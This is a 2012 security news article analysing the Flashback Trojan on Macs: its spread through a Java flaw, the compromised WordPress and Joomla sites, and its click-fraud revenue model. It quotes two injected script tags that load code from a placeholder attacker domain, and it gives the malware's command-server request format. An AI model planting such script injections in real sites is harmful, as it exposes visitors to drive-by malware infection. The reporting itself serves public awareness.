• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Hackers deploy fake SonicWall VPN App to steal corporate credentials

 | 

Mainline Health Systems data breach impacted over 100,000 individuals

 | 

Disrupting the operations of cryptocurrency mining botnets

 | 

Prometei botnet activity has surged since March 2025

 | 

The U.S. House banned WhatsApp on government devices due to security concerns

 | 

Russia-linked APT28 use Signal chats to target Ukraine official with malware

 | 

China-linked APT Salt Typhoon targets Canadian Telecom companies

 | 

U.S. warns of incoming cyber threats following Iran airstrikes

 | 

McLaren Health Care data breach impacted over 743,000 people

 | 

American steel giant Nucor confirms data breach in May attack

 | 

The financial impact of Marks & Spencer and Co-op cyberattacks could reach £440M

 | 

Iran-Linked Threat Actors Cyber Fattah Leak Visitors and Athletes' Data from Saudi Games

 | 

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 50

 | 

Security Affairs newsletter Round 529 by Pierluigi Paganini – INTERNATIONAL EDITION

 | 

Iran confirmed it shut down internet to protect the country against cyberattacks

 | 

Godfather Android trojan uses virtualization to hijack banking and crypto apps

 | 

Cloudflare blocked record-breaking 7.3 Tbps DDoS attack against a hosting provider

 | 

Linux flaws chain allows Root access across major distributions

 | 

A ransomware attack pushed the German napkin firm Fasana into insolvency

 | 

Researchers discovered the largest data breach ever, exposing 16 billion login credentials

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Cyber Crime
  • Malware
  • Security
  • Flashback Trojan, a business opportunity for all

Flashback Trojan, a business opportunity for all

Pierluigi Paganini May 02, 2012

Many people who do not work in our sector are asking me two questions with increasing frequency:

  • Can a virus infect a MAC pc?
  • Is it possible to monetize a malware development? How is it possible?

Obvious my answers, we cannot think of a software system free of bugs and vulnerabilities. To those who I have proposed me the questions I recently brought as an example the Flashback Trojan and the related botnet known as Flashfake. Apple isn’t immune to malware, it’s code is rich of vulnerabilities like any other and during the various security context its products have been exploited.

Flashback was created in September 2011 to disguise itself as an Adobe Flash Player installer, using Flash player layout. Once it is installed search user names and passwords stored on the victims. The Trojan has been created to conduct click fraud scam by hijacking people’s search engine results inside their web browsers, stealing banking or login credential. Of course once infected the system it could be used as part of a botnet causing bigger damages. The botnet related to the Flashback has been designed by cyber criminals to conduct a click fraud scam, taking advantage of pay-per-click campaigns by advertising companies.

The cybercrime is demonstrating an increasing interest in those activities that could ensure high profits and low risks such as cyber scams, digital Identity thieves an similar frauds. Apple company and its products represent a great business opportunity in this optical, let’s consider also the between the Apple’s users is largely diffused the conviction that their products are immune to malware, a wrong consideration that expose them to serious risks.

The contagion

The Flashback trojan, also known as OSX.Flashback.K was being distributed using the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which was patched by Oracle in February. The main problem related to MAC platforms was the large interval between the dates in which the patch was issued and it’s availability for Apple products, around 6 weeks during which Flashback Trojan infected Macs on a large scale.

The Flashback creators took advantage of the gap between Oracle and Apple’s patches by exploiting vulnerable websites using WordPress and Joomla to add malicious code snippets.

<script src=”[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1″></script>
<script src=”[ATTACKER_DOMAIN].rr.nu/nl.php?p=d”></script>

When a user visited an infected web site on an unpatched Mac, OSX.Flashback.K would be installed.

The Flashback Business

It a Flashback Trojan doesn’t represent a serious concern for Mac World, we must to consider the collateral effects that are not negligible and that have transformed the malware in a business opportunity for cyber criminals and security firms.

Let’s start from the security firms, that have had historically problems to penetrate the MAC world due the assumption made by Apple’s users. Well the media effect of the virus has fortunately overturned the user’s conviction suddenly pushing up the demand for antivirus software for Apple. The major companies operating in the field of computer security have responded promptly providing what has been requested by the market, in this case the news has worked as a driving force for an industry that struggled to take off.

That is the first economic effect of the cyber threat, the second one is related to the benefit that crime industry is still having. To explain it I introduce a study realized by Symantec experts which have analyzed Flashback malware. The security specialists have found an ad-clicking component used by the malware designers to generate revenue.

“Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker’s choosing, where they receive revenue from the click,” Symantec wrote in a blog post. “Google never receives the intended ad click.”

The proposed schema let the creators implement a revenue process really profitable already implemented in similar scam. Last August W32.Xpaj.B Trojan realized daily profits of $450 placing on 25,000 pc infected. Comparing the figures with the infection related to Flashback, proceeding with a deductive mechanism, the experts declared that with a botnet composed of 650,000 infected machines the creators of Flashback could rises a revenue of $10,000 per day.

The ad-clicking component

According to Symantec what actually is worrying regarding the trojan is the ad-clicking component of Flashback was loaded into common browser like Chrome, Safari and Firefox. ad-clicking component

The ad-clicking component is able to intercept all GET and POST requests directly from the browser. The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to the malicious server in the following form:

http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]

In the following picture is shown the response RC4 decrypted and then base64 decoded:

 

This hijacked ad click is based on a user searching for “toys”. We can note the presence of the word “BIDOK” that has been recognized as a Flashback command. It’s is also clear the value of 0.8 cents for the click and the redirection URL.

It ‘easy to imagine how profitable can be a similar scam. The creators of malware are just enjoying the growth of their profits, click after click.

Pierluigi Paganini


facebook linkedin twitter

antivirus software Apple botnet Botnets cyber threat cyber threats Cybercrime Flashback Large scale infiltration malware stuxnet Symantec Trojan virus vulnerabilities

you might also like

Pierluigi Paganini June 25, 2025
Hackers deploy fake SonicWall VPN App to steal corporate credentials
Read more
Pierluigi Paganini June 25, 2025
Mainline Health Systems data breach impacted over 100,000 individuals
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Hackers deploy fake SonicWall VPN App to steal corporate credentials

    Hacking / June 25, 2025

    Mainline Health Systems data breach impacted over 100,000 individuals

    Data Breach / June 25, 2025

    Disrupting the operations of cryptocurrency mining botnets

    Malware / June 25, 2025

    Prometei botnet activity has surged since March 2025

    Cyber Crime / June 25, 2025

    The U.S. House banned WhatsApp on government devices due to security concerns

    Mobile / June 24, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT